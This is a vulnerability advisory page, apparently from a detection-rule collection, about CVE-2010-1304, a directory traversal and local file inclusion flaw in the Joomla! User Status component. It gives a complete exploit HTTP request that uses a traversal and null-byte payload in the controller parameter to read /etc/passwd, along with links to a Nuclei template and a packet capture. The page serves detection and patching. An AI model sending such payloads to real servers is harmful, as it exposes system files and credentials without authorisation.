🔙 목록으로 돌아가기

CVE-2010-1304: Joomla! Component User Status - Local File Inclusion

TitleJoomla! Component User Status - Local File Inclusion
Authordaffainfo
SeverityMedium
ImpactUnauthenticated attackers can read arbitrary files on the server through directory traversal in the controller parameter of the User Status component, potentially exposing sensitive configuration files, database credentials in wp-config.php or configuration.php, and user data.
RemediationUpgrade to the latest version to mitigate this vulnerability.
CVSS Score5
EPSS Score0.03144
CVE IDCVE-2010-1304
CWE IDCWE-22
Tags cve cve2010 joomla lfi status edb joomlamo vuln

🔍 Vulnerability Description

A directory traversal vulnerability in userstatus.php in the User Status (com_userstatus) component 1.21.16 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.

🌐 HTTP Request

GET /index.php?option=com_userstatus&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2010/CVE-2010-1304.yaml

🦈 Packet Capture: ⬇️ Download cve-2010-1304.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A